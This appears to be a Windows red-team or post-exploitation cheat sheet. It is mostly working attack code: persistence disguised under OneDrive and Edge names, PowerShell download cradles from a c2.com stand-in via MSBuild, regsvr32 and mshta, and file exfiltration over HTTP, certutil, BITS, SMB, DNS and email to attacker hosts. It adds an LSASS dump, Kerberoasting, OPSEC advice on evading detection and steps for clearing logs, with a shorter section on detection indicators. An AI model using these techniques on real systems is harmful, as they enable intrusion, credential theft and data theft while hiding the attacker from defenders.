Startup Folder (Even More Obvious)

🎯 What to Identify: Folder where files execute on user logon 💡 How to Use: Simple to implement, but first place defenders check

# Current User Startup
$startupPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"

# Create Shortcut (Looks Legitimate)
$WshShell = New-Object -ComObject WScript.Shell
$shortcut = $WshShell.CreateShortcut("$startupPath\OneDrive.lnk")
$shortcut.TargetPath = "powershell.exe"
$shortcut.Arguments = "-WindowStyle Hidden -NoProfile -Command payload"
$shortcut.WindowStyle = 7  # Hidden window
$shortcut.Description = "OneDrive Sync"
$shortcut.Save()

# Or Simple Batch File
$script = @"
@echo off
powershell.exe -WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://c2.com/payload.ps1')
"@
Set-Content -Path "$startupPath\WindowsUpdate.bat" -Value $script

Startup Folder Locations:

Current User: C:\Users[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 
All Users: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

When to Use:

Quick and dirty persistence
Non-technical target (less likely to check)
Combined with other methods for redundancy

When NOT to Use:

Security-conscious environment
Any environment with competent defenders
When stealth is required

Scheduled Tasks (Flexible, Powerful)

🎯 What to Identify: Task Scheduler for timed/event-based execution 💡 How to Use: Most versatile persistence with fine-grained control

# Logon Trigger - Execute when user logs in
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -NoProfile -Command payload"
$trigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME
$principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -Hidden

Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateTaskUserCore" -Action $action -Trigger $trigger -Principal $principal -Settings $settings

# Periodic Trigger - Execute every 6 hours
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Hours 6) -RepetitionDuration ([TimeSpan]::MaxValue)
# Use: Maintains persistence even if process is killed

# Daily Trigger - Execute at specific time
$trigger = New-ScheduledTaskTrigger -Daily -At 3am
# Use: During low-activity hours (less likely to be noticed)

# As SYSTEM - Highest privilege execution
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -LogonType ServiceAccount -RunLevel Highest
# Use: For privilege escalation persistence

Real Windows Task Names to Mimic:

MicrosoftEdgeUpdateTaskUserCore
GoogleUpdateTaskMachineCore
Adobe Acrobat Update Task
CCleanerSkipUAC
OneDrive Standalone Update Task v2

Task Trigger Options:

AtLogOn → User login (common, but monitored)
AtStartup → System boot (more privileged)
Daily/Weekly → Scheduled maintenance
OnIdle → When system is idle (stealthy)
OnEvent → Specific Windows events (advanced)

Hidden Task Setting:

$settings = New-ScheduledTaskSettingsSet -Hidden
# Makes task invisible in Task Scheduler GUI
# Still visible via PowerShell Get-ScheduledTask

WMI Event Subscriptions (Advanced, Stealthy)

🎯 What to Identify: WMI event triggers for code execution 💡 How to Use: Sophisticated persistence rarely checked by defenders

# Event Filter - WHEN to trigger (every 60 seconds in this example)
$filterArgs = @{
    Name = "WindowsUpdateFilter"
    EventNamespace = "root\cimv2"
    QueryLanguage = "WQL"
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"
}
$filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $filterArgs

# Event Consumer - WHAT to do when triggered
$consumerArgs = @{
    Name = "WindowsUpdateConsumer"
    CommandLineTemplate = "powershell.exe -WindowStyle Hidden -NoProfile -Command payload"
}
$consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $consumerArgs

# Binding - Connect filter to consumer
$bindingArgs = @{
    Filter = $filter
    Consumer = $consumer
}
Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $bindingArgs

Alternative Triggers:

# Trigger when specific process starts (e.g., Outlook)
$query = "SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = 'outlook.exe'"

# Trigger at specific time daily
$query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 14 AND TargetInstance.Minute = 30"

# Trigger on user logon
$query = "SELECT * FROM __InstanceCreationEvent WITHIN 15 WHERE TargetInstance ISA 'Win32_LogonSession'"

# Trigger on USB insertion
$query = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE TargetInstance ISA 'Win32_DiskDrive'"

Enumerate Existing WMI Subscriptions:

# List all event filters
Get-WmiObject -Namespace root\subscription -Class __EventFilter | Select-Object Name, Query

# List all consumers
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer | Select-Object Name, CommandLineTemplate

# List all bindings
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding

Remove WMI Persistence:

Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='WindowsUpdateFilter'" | Remove-WmiObject
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='WindowsUpdateConsumer'" | Remove-WmiObject
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -match 'WindowsUpdateFilter'} | Remove-WmiObject

Why WMI Persistence is Powerful:

Not visible in normal persistence locations
Most admins don't know how to check for it
Can trigger on complex system events
Persists across reboots
Requires admin to create, but very stealthy

📋 PHASE 6: DATA EXFILTRATION

PowerShell Web Upload (Fast, Encrypted)

🎯 What to Identify: Files to exfiltrate, C2 web server 💡 How to Use: HTTP/HTTPS upload using native PowerShell

# Simple POST Upload
$fileContent = [System.IO.File]::ReadAllBytes("C:\sensitive\data.txt")
Invoke-RestMethod -Uri "http://exfil-server.com/upload" -Method POST -Body $fileContent
# Use: Small files, quick exfil
# Logged: Network connections, HTTP requests

# Chunked Upload (Large Files)
$file = "C:\sensitive\large-file.zip"
$chunkSize = 1MB  # Adjust based on network conditions
$buffer = New-Object byte[] $chunkSize
$fileStream = [System.IO.File]::OpenRead($file)

$chunkNumber = 0
while (($bytesRead = $fileStream.Read($buffer, 0, $chunkSize)) -gt 0) {
    $chunkNumber++
    $chunkData = $buffer[0..($bytesRead-1)]
    Invoke-RestMethod -Uri "http://server.com/upload?chunk=$chunkNumber&file=data.zip" -Method POST -Body $chunkData
    Start-Sleep -Milliseconds 500  # Throttle to avoid detection
}
$fileStream.Close()
# Server reassembles chunks into original file

# HTTPS with Self-Signed Certificate
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-RestMethod -Uri "https://server.com/upload" -Method POST -Body $data
# Use: Encrypted transfer, avoids DPI (Deep Packet Inspection)

OPSEC for Web Exfiltration:

✅ Use HTTPS (encrypted, harder to inspect)
✅ Throttle transfers (avoid bandwidth spikes)
✅ Use during business hours (blend with normal traffic)
✅ Chunk large files (avoid single large transfer)
⚠️ Beware of SSL inspection (corporate proxies)

certutil (Microsoft-Signed Binary)

🎯 What to Identify: Need to transfer files using native tools 💡 How to Use: Abuse certificate utility for file operations

REM Download File (can be reversed conceptually for upload)
certutil.exe -urlcache -split -f http://server.com/file.txt C:\temp\file.txt
# -urlcache = Use URL cache
# -split = Write file to disk
# -f = Force overwrite

REM Base64 Encode for URL-based Exfiltration
certutil.exe -encode C:\sensitive\data.txt C:\temp\encoded.txt
# Then send encoded.txt via other means (DNS, HTTP GET with data in URL)

REM Clean URL Cache (Remove Artifacts)
certutil.exe -urlcache * delete

Certutil Exfiltration Technique:

# Encode file as base64
$fileContent = [System.IO.File]::ReadAllBytes("C:\sensitive\data.txt")
$base64 = [Convert]::ToBase64String($fileContent)

# Split into URL-safe chunks
$chunkSize = 8000  # URL length limits
for ($i = 0; $i -lt $base64.Length; $i += $chunkSize) {
    $chunk = $base64.Substring($i, [Math]::Min($chunkSize, $base64.Length - $i))
    certutil.exe -urlcache -split -f "http://server.com/receive?data=$chunk" null
}
# Server collects chunks from logs, reassembles base64, decodes

Why Certutil:

Microsoft-signed binary (trusted)
Designed for certificate operations (legitimate)
Often whitelisted in application control
Less suspicious than PowerShell downloads

BITS (Background Intelligent Transfer)

🎯 What to Identify: Large files, need resumable transfers 💡 How to Use: Windows Update technology for stealthy file transfer

REM Create BITS Job for Upload
bitsadmin /create ExfilJob
bitsadmin /addfile ExfilJob C:\sensitive\data.zip http://server.com/upload/data.zip
bitsadmin /setpriority ExfilJob FOREGROUND
bitsadmin /resume ExfilJob

REM Monitor Transfer Progress
bitsadmin /monitor

REM Complete and Remove Job
bitsadmin /complete ExfilJob

REM Download Example
bitsadmin /transfer DownloadJob /download /priority HIGH http://server.com/file.zip C:\temp\file.zip

BITS Advantages:

Designed for large file transfers
Automatically resumes if interrupted
Throttles bandwidth (avoids network saturation)
Used by Windows Update (legitimate traffic)
Persistent across reboots
Low CPU/network priority by default

BITS Exfiltration Strategy:

Create BITS job during business hours
Set low priority (background transfer)
Transfer large database dumps or file archives
Monitor job status periodically
Complete job when finished
Clean up job artifacts

Detection:

BITS jobs logged in Windows Event Log
Unusual BITS destinations (external IPs)
Large transfers to non-Microsoft domains

SMB Exfiltration (Internal Networks)

🎯 What to Identify: SMB access to external/attacker-controlled server 💡 How to Use: File copy over SMB (looks like normal file sharing)

REM Map Network Drive
net use Z: \\exfil-server\share /user:username password

REM Copy Files
copy C:\sensitive\data.zip Z:\
copy C:\sensitive\*.docx Z:\documents\

REM Disconnect
net use Z: /delete

# Direct Copy (No Drive Mapping)
Copy-Item C:\sensitive\data.zip \\exfil-server\share\
Copy-Item C:\sensitive\folder\* \\exfil-server\share\folder\ -Recurse

# With Credentials
$cred = Get-Credential
New-PSDrive -Name "Z" -PSProvider FileSystem -Root "\\exfil-server\share" -Credential $cred
Copy-Item C:\sensitive\data.zip Z:\
Remove-PSDrive -Name "Z"

SMB Exfiltration Benefits:

Encrypted (SMBv3)
Normal corporate traffic
Fast transfers
Works across internal networks
Supports large files

Requirements:

Port 445 accessible to exfil server
SMB not blocked by firewall
Server with SMB share configured

DNS Exfiltration (Slow but Stealthy)

🎯 What to Identify: Need covert channel, DNS not inspected 💡 How to Use: Encode data in DNS queries (very hard to detect)

# Read File to Exfiltrate
$data = [System.IO.File]::ReadAllBytes("C:\sensitive\passwords.txt")
$encoded = [Convert]::ToBase64String($data)

# Send via DNS Queries
$chunkSize = 32  # DNS label max = 63 chars, conservative chunk size
$domain = "exfil.yourdomain.com"

for ($i = 0; $i -lt $encoded.Length; $i += $chunkSize) {
    $chunk = $encoded.Substring($i, [Math]::Min($chunkSize, $encoded.Length - $i))
    $subdomain = "$chunk.$domain"
    
    # Make DNS query (data in subdomain)
    nslookup $subdomain 2>$null | Out-Null
    
    Start-Sleep -Milliseconds 100  # Throttle queries
}

# With Sequence Numbers (Error Correction)
$sequenceNumber = 0
for ($i = 0; $i -lt $encoded.Length; $i += $chunkSize) {
    $chunk = $encoded.Substring($i, [Math]::Min($chunkSize, $encoded.Length - $i))
    $subdomain = "seq$sequenceNumber.$chunk.$domain"
    nslookup $subdomain 2>$null | Out-Null
    $sequenceNumber++
    Start-Sleep -Milliseconds 100
}

# End Marker
nslookup "end.$domain" 2>$null | Out-Null

How DNS Exfiltration Works:

Encode file as base64
Split into small chunks (DNS label limit)
Each chunk becomes a subdomain
Query: chunk1.exfil.yourdomain.com
Your DNS server logs the query
Extract chunks from logs, reassemble file

DNS Exfiltration Characteristics:

Very Slow (DNS overhead is significant)
Very Stealthy (DNS queries are everywhere)
Rarely Blocked (can't block DNS)
Hard to Detect (need deep DNS inspection)

When to Use DNS:

High-security environment
Other protocols blocked/monitored
Small, high-value data (passwords, keys)
Time is not critical

Email Exfiltration (Hiding in Plain Sight)

🎯 What to Identify: Email access, legitimate reason to email externally 💡 How to Use: Send data as email attachments (very common activity)

# Send-MailMessage (If SMTP Available)
Send-MailMessage -From "user@company.com" -To "exfil@attacker.com" -Subject "Weekly Report" -Body "Please see attached." -Attachments "C:\sensitive\data.zip" -SmtpServer smtp.company.com
# Requires: SMTP relay without authentication, or valid credentials

# Outlook COM Automation (Uses User's Outlook)
$outlook = New-Object -ComObject Outlook.Application
$mail = $outlook.CreateItem(0)  # 0 = MailItem
$mail.To = "exfil@attacker.com"
$mail.Subject = "Monthly Report - Q4"
$mail.Body = "See attached spreadsheet."
$mail.Attachments.Add("C:\sensitive\financial_data.xlsx")
$mail.Send()
[System.Runtime.Interopservices.Marshal]::ReleaseComObject($outlook) | Out-Null

Email Exfiltration Advantages:

Looks 100% legitimate
Uses user's actual email account
Normal business activity
Can send large attachments
Encrypted if using TLS

OPSEC for Email Exfil:

Use realistic subject lines
Send during business hours
Don't send to obvious attacker addresses
Spread across multiple emails if large
Use company nomenclature in subjects

Email Exfil Scenarios:

Good: "Q4 Financial Analysis.xlsx" → External auditor 
Bad: "AllPasswords.txt" → gmail account

Good: Scheduled monthly report timing 
Bad: 3am Sunday morning email

Good: Multiple small attachments over days 
Bad: 50GB attachment in single email

📋 BYPASSING APPLICATION WHITELISTING

MSBuild (Execute C# Code via XML)

🎯 What to Identify: MSBuild.exe location, need to execute arbitrary code 💡 How to Use: Compile and execute C# code inline without .exe files

<!-- Save as build.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Execute">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs">
      <![CDATA[
        using System;
        using System.Diagnostics;
        using Microsoft.Build.Framework;
        using Microsoft.Build.Utilities;

        public class ClassExample : Task {
            public override bool Execute() {
                // Your code here - this example launches calc
                Process.Start("calc.exe");
                
                // Or execute PowerShell payload
                Process.Start(new ProcessStartInfo() {
                    FileName = "powershell.exe",
                    Arguments = "-NoProfile -Command \"IEX (New-Object Net.WebClient).DownloadString('http://c2.com/payload.ps1')\"",
                    UseShellExecute = false,
                    CreateNoWindow = true
                });
                
                return true;
            }
        }
      ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

REM Execute the MSBuild Project
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\temp\build.xml

REM 64-bit Version
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\temp\build.xml

Why MSBuild Bypasses Whitelisting:

Microsoft-signed binary (trusted)
Developers need it (can't block)
Designed to compile/execute code
Code compiles in memory (no .exe on disk)
Can execute any .NET code

What You Can Do with MSBuild:

Download and execute payloads
Full reverse shell implementation
Shellcode injection via P/Invoke
Registry/file manipulation
Credential harvesting
Anything C# can do

Regsvr32 (Remote Scriptlet Execution)

🎯 What to Identify: Regsvr32.exe (always present), web server for scriptlets 💡 How to Use: Execute JScript/VBScript from remote URLs

<!-- Save as bypass.sct on your web server -->
<?XML version="1.0"?>
<scriptlet>
  <registration progid="Bypass" classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
  </registration>
  <script language="JScript">
    <![CDATA[
      var shell = new ActiveXObject("WScript.Shell");
      
      // Test execution
      shell.Run("calc.exe");
      
      // Real payload - PowerShell download cradle
      var command = 'powershell.exe -NoProfile -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString(\'http://c2.com/payload.ps1\')"';
      shell.Run(command, 0, false);
      
      // Can also: Download files, create scheduled tasks, modify registry
    ]]>
  </script>
</scriptlet>

REM Execute Remote Scriptlet
regsvr32.exe /s /n /u /i:http://server.com/bypass.sct scrobj.dll

REM Flag Explanation:
REM /s = Silent (no message boxes)
REM /n = Dont call DllRegisterServer
REM /u = Unregister mode (with /n, just loads scriptlet)
REM /i:URL = Pass URL to scriptlet
REM scrobj.dll = Windows Script Component runtime

Regsvr32 Capabilities:

Execute JScript/VBScript
Download additional payloads
Create persistence mechanisms
File operations (read/write)
Registry manipulation
Network requests (HTTP/HTTPS)
Process execution

Detection Indicators:

Regsvr32 with /i:http:// parameter
Network connections from regsvr32.exe
Unusual parent process for regsvr32
Scrobj.dll parameter

Mshta (HTML Application Execution)

🎯 What to Identify: Mshta.exe (present on all Windows), HTA capabilities 💡 How to Use: Execute VBScript/JScript with full system access

<!-- Save as update.hta on web server -->
<!DOCTYPE html>
<html>
<head>
  <title>System Update</title>
  <HTA:APPLICATION
    ID="SystemUpdate"
    APPLICATIONNAME="System Update"
    BORDER="none"
    CAPTION="no"
    SHOWINTASKBAR="no"
    WINDOWSTATE="minimize"
  />

  <script language="VBScript">
    Sub Window_OnLoad
      Dim objShell
      Set objShell = CreateObject("WScript.Shell")
      
      ' Execute command
      objShell.Run "calc.exe", 0, False
      
      ' PowerShell payload
      Dim command
      command = "powershell.exe -NoProfile -WindowStyle Hidden -Command ""IEX (New-Object Net.WebClient).DownloadString('http://c2.com/payload.ps1')"""
      objShell.Run command, 0, False
      
      ' Close HTA window
      window.close()
    End Sub
  </script>
</head>
<body>
  <div>Loading system update...</div>
</body>
</html>

REM Execute Remote HTA
mshta.exe http://server.com/update.hta

REM Inline VBScript (No File Needed!)
mshta.exe vbscript:Close(Execute("CreateObject(""WScript.Shell"").Run ""calc.exe"", 0"))

REM Inline JavaScript
mshta.exe javascript:a=(GetObject("script:http://server.com/payload.js")).Run();close();

REM PowerShell Download Cradle via Mshta
mshta.exe vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell.exe -NoProfile -Command IEX (New-Object Net.WebClient).DownloadString('http://c2.com/payload.ps1')"", 0:close")

Mshta Advantages:

Microsoft-signed binary
No sandbox (unlike browser)
Full ActiveX access
Can execute inline (no file needed)
Works on all Windows versions

Mshta Use Cases:

Initial access vector
Application whitelisting bypass
Fileless execution
Download and execute payloads
C2 client implementation

🛡️ OPERATIONAL SECURITY (OPSEC)

High-Risk Actions (Likely Alerts)

🎯 What to Avoid: Actions that trigger immediate detection 💡 Why They're Risky:

❌ Disabling Windows Defender/Firewall Completely

Event logs created immediately
Group Policy may revert changes
Obvious indicator of compromise
Better: Add specific exclusions or firewall rules

❌ Ping Sweeps of Entire Subnets

Every ping logged
Network monitoring sees scan pattern
Obvious reconnaissance activity
Better: Use ARP cache, passive enumeration

❌ Dumping LSASS in Monitored Environments

EDR specifically watches LSASS access
Event ID 10 (process access) logged
Sysmon alerts on LSASS access
Better: Time during maintenance windows, use alternative methods

❌ Creating Services with Suspicious Names

Event ID 7045 (new service) heavily monitored
Names like "backdoor" or "payload" obvious
Better: Mimic legitimate Windows service names

❌ Large Data Transfers in Single Bursts

DLP (Data Loss Prevention) alerts
Network anomaly detection
Bandwidth spikes visible
Better: Chunk data, throttle transfers, blend with normal traffic

❌ Executing from TEMP/Downloads Directories

Common malware behaviour
Application whitelisting often blocks these paths
EDR watches these directories closely
Better: Use legitimate Windows directories (C:\Windows\System32)

Lower-Risk Alternatives

🎯 What to Do Instead: Stealthier approaches 💡 How to Stay Under the Radar:

✅ Use Specific Firewall Rules Instead of Disabling netsh advfirewall firewall add rule name="Allow Port 4444" dir=in action=allow protocol=TCP localport=4444

Looks like legitimate firewall management
Less obvious than disabled firewall
Can be named like legitimate rules

✅ Use ARP Cache and Existing Connections for Recon Get-NetNeighbor Get-NetTCPConnection -State Established

Passive reconnaissance
No network scanning traffic
Systems already in communication = safe targets

✅ Time LSASS Dumps During Maintenance Windows

Blend with legitimate admin activity
During high system activity (masks in logs)
Off-hours when SOC staffing is lower
After system reboot (many processes access LSASS)

✅ Use Legitimate-Looking Service/Task Names Good: "WindowsUpdateService", "MicrosoftEdgeUpdateCore" Bad: "backdoor", "payload", "malware"

Mimic real Windows service names
Research actual services on target OS

✅ Chunk and Throttle Data Transfers for ($i = 0; $i -lt $data.Length; $i += 1MB) { # Send chunk Start-Sleep -Seconds 60 # Throttle }

Avoid bandwidth spikes
Blend with normal network traffic
Send during business hours

✅ Execute from Standard Windows Directories C:\Windows\System32 C:\Windows C:\Program Files\

Application whitelisting allows by default
Normal location for system processes
Less suspicious in logs

Cleanup Checklist

🎯 What to Remove: Artifacts left behind 💡 How to Cover Tracks:

# Remove Scheduled Tasks
Unregister-ScheduledTask -TaskName "YourTaskName" -Confirm:$false

# Remove Registry Run Keys
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "YourKey"
Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "YourKey"

# Remove WMI Event Subscriptions
Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='YourFilter'" | Remove-WmiObject
Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='YourConsumer'" | Remove-WmiObject
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -match 'YourFilter'} | Remove-WmiObject

# Remove Services
sc.exe delete YourService

# Remove Startup Folder Items
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\YourFile.lnk"

# Clear PowerShell History
Remove-Item (Get-PSReadlineOption).HistorySavePath -Force

# Remove Port Forwards
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
netsh interface portproxy reset

# Remove Firewall Rules
netsh advfirewall firewall delete rule name="Your Rule Name"

# Delete Temporary Files
Remove-Item C:\temp\*.dmp -Force
Remove-Item C:\temp\*.hive -Force
Remove-Item C:\temp\*.txt -Force

# Clear Event Logs (VERY OBVIOUS - Avoid Unless Necessary!)
wevtutil cl Security    # ⚠️ This triggers alerts!
wevtutil cl System
wevtutil cl Application
wevtutil cl "Windows PowerShell"
wevtutil cl "Microsoft-Windows-PowerShell/Operational"

Cleanup Priority:

High Priority: Credential dumps, registry hives, sensitive files
Medium Priority: Scheduled tasks, services, persistence mechanisms
Low Priority: PowerShell history, temp files
Avoid: Clearing event logs (very suspicious)

📚 DETECTION INDICATORS

Critical Event IDs

🎯 What Defenders Watch: Windows Event Log entries 💡 What They Mean:

Event ID 4688 - Process Creation Logged

When: Any new process starts 
What It Shows: Process name, command line, parent process 
Red Flags: PowerShell with -EncodedCommand, -NoProfile, -WindowStyle Hidden Example: powershell.exe -NoProfile -Command "IEX (New-Object..."

Event ID 4624 - Successful Logon Logged

When: User/account logs in 
Types to Watch: Type 2 = Interactive (console logon) 
Type 3 = Network (SMB, WMI, PsExec) 
Type 10 = RemoteInteractive (RDP) 
Red Flags: Type 3 from unusual IPs, multiple type 3 in short time (lateral movement)

Event ID 4648 - Explicit Credential Use Logged

When: Process uses RunAs or enters different credentials 
What It Shows: Account that performed action, account credentials used 
Red Flags: Standard user running commands as administrator

Event ID 4672 - Special Privileges Assigned Logged

When: Account logs in with privileged token 
What It Shows: Privileges assigned (SeDebugPrivilege, etc.) 
Red Flags: Non-admin accounts getting SeDebugPrivilege

Event ID 7045 - New Service Installed Logged

When: New Windows service created 
What It Shows: Service name, executable path, account 
Red Flags: Services running cmd.exe, powershell.exe, paths in TEMP

Event ID 106 - Scheduled Task Registered

Event ID 200 - Scheduled Task Executed Logged

When: Task created or run 
What It Shows: Task name, action, user 
Red Flags: Tasks running PowerShell, unusual names, SYSTEM account

Event ID 4103 - PowerShell Module Logging

Event ID 4104 - PowerShell Script Block Logging Logged

When: PowerShell commands execute 
What It Shows: Actual PowerShell code executed 
Red Flags: Invoke-Expression, DownloadString, EncodedCommand, Mimikatz

Suspicious Command-Line Patterns

🎯 What Triggers Alerts: Specific command patterns 💡 Why They're Suspicious:

REM PowerShell Indicators
powershell.exe -EncodedCommand [base64]
   Why: Obfuscated commands, hiding intent

powershell.exe -NoProfile -WindowStyle Hidden
   Why: Trying to avoid logging and visibility

IEX (New-Object Net.WebClient).DownloadString('http://...')
   Why: Download and execute pattern (download cradle)

Invoke-Mimikatz, Invoke-ReflectivePEInjection
   Why: Known offensive PowerShell tools

-ExecutionPolicy Bypass
   Why: Bypassing PowerShell security controls

REM Native Tool Abuse
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump [PID] [file] full
   Why: LSASS dumping technique

certutil.exe -urlcache -split -f http://
   Why: File download abuse

regsvr32.exe /s /n /u /i:http:// scrobj.dll
   Why: Remote scriptlet execution

mshta.exe http:// OR mshta.exe vbscript: OR mshta.exe javascript:
   Why: Remote code execution or inline script

REM Network Tools
netsh interface portproxy add v4tov4
   Why: Port forwarding for pivoting

netsh wlan show profile name="*" key=clear
   Why: WiFi credential extraction

REM Lateral Movement
wmic /node:[TARGET] process call create
   Why: Remote process creation

schtasks /create /tn /tr /s [TARGET]
   Why: Remote scheduled task creation

sc.exe \\[TARGET] create
   Why: Remote service creation

🎯 QUICK WINS CHECKLIST

First 5 Minutes (Orient & Assess)

🎯 Goal: Understand where you are and what you have 💡 Actions:

# 1. Check Current Privileges
whoami /all
   Look for: BUILTIN\Administrators, SeDebugPrivilege, SeImpersonatePrivilege
   Implications: Admin = full local control, SeDebugPrivilege = can dump LSASS

# 2. Check Domain Membership
(Get-WmiObject -Class Win32_ComputerSystem).PartOfDomain
(Get-WmiObject -Class Win32_ComputerSystem).Domain
   Look for: True + domain name
   Implications: Domain-joined = AD attack surface available

# 3. List Local Admins
Get-LocalGroupMember -Group "Administrators"
   Look for: Domain accounts in local admin
   Implications: Those accounts can access this system remotely

# 4. Check for Security Products
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct
Get-Process | Select-String -Pattern "crowdstrike|carbon|sentinel|defender"
   Look for: EDR agents, antivirus
   Implications: Adjust tactics based on security posture

# 5. PowerShell History Check
Get-Content (Get-PSReadlineOption).HistorySavePath
   Look for: Passwords, admin commands, credential patterns
   Implications: Quick credential wins

Process Relationships to Monitor

🎯 What's Abnormal: Parent-child process patterns 💡 Suspicious Relationships:

❌ Office Applications → PowerShell/cmd.exe 
Web Browsers → PowerShell/Scripts 
chrome.exe → powershell.exe 
firefox.exe → wscript.exe 
Why Suspicious: Drive-by download, browser exploit

❌ MSBuild/Regsvr32/Mshta → Network Connections 
MSBuild.exe → outbound connection to external IP 
regsvr32.exe → downloading from internet 
mshta.exe → connecting to C2 server 
Why Suspicious: Application whitelisting bypass with C2

❌ Certutil → Network Activity 
certutil.exe → HTTP requests 
certutil.exe → downloading executables 
Why Suspicious: File transfer abuse

❌ Rundll32 → LSASS Access 
rundll32.exe → opening handle to lsass.exe 
Why Suspicious: Credential dumping (comsvcs.dll technique)

❌ Normal Processes from Unusual Locations powershell.exe running from C:\Users[user]\AppData\Local\Temp
cmd.exe running from C:\Users[user]\Downloads
Why Suspicious: Malware execution

✅ Normal Relationships (For Reference) explorer.exe → cmd.exe (user opened command prompt) svchost.exe → powershell.exe (legitimate system task) services.exe → service executable (normal service start)

First 15 Minutes (Low-Hanging Fruit)

🎯 Goal: Harvest easy credentials and understand environment 💡 Actions:

# 1. Search for Credentials in Common Files
Get-ChildItem C:\Users\$env:USERNAME\Documents -Recurse -Include *.txt,*.xml,*.config | Select-String -Pattern "password"
Get-ChildItem C:\inetpub\wwwroot -Recurse -Include web.config -ErrorAction SilentlyContinue
   Look for: Cleartext passwords, connection strings
   Implications: Application, database, or user credentials

# 2. Check Credential Manager
cmdkey /list
   Look for: Saved RDP connections, network shares
   Implications: Targets for lateral movement

# 3. Enumerate Domain (If Domain-Joined)
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
$searcher = [ADSISearcher]"(samAccountType=805306368)"; $searcher.FindAll() | Select-Object -First 20
   Look for: Domain controllers, user accounts, computers
   Implications: AD infrastructure map, potential targets

# 4. Check for Unquoted Service Paths
Get-WmiObject win32_service | Where-Object {$_.PathName -notlike '"*' -and $_.PathName -like '* *'}
   Look for: Services with unquoted paths containing spaces
   Implications: Privilege escalation opportunity

# 5. List Installed Software
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion
   Look for: Development tools, VPN clients, database tools
   Implications: Credential storage applications, user role identification

First Hour (Establish Foothold)

🎯 Goal: Secure access, escalate if possible, prepare for lateral movement 💡 Actions:

# 1. Attempt LSASS Dump (If Admin)
if (([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    $lsass = Get-Process lsass
    rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass.Id C:\temp\lsass.dmp full
}
   Goal: Extract credentials from memory
   Exfiltrate: Parse offline with pypykatz

# 2. Kerberoasting (If Domain Environment)
$searcher = [ADSISearcher]"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512))"
$searcher.FindAll()
Add-Type -AssemblyName System.IdentityModel
# Request tickets for each SPN found
   Goal: Service account credentials for offline cracking
   Implications: Service accounts often have elevated privileges

# 3. Establish Persistence Mechanism
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden -Command IEX (New-Object Net.WebClient).DownloadString('http://c2.com/p.ps1')"
$trigger = New-ScheduledTaskTrigger -Daily -At 3am
Register-ScheduledTask -TaskName "MicrosoftEdgeUpdateCore" -Action $action -Trigger $trigger
   Goal: Maintain access if discovered and kicked out
   Method: Scheduled task, WMI subscription, or registry run key

# 4. Begin Lateral Movement Recon
Get-NetNeighbor | Where-Object {$_.State -eq "Reachable"}
Get-ADComputer -Filter * -Properties * | Select-Object Name, OperatingSystem, LastLogonDate
   Goal: Identify next targets
   Look for: Servers, admin workstations, recently active systems

# 5. Identify High-Value Targets
Get-ADGroupMember -Identity "Domain Admins"
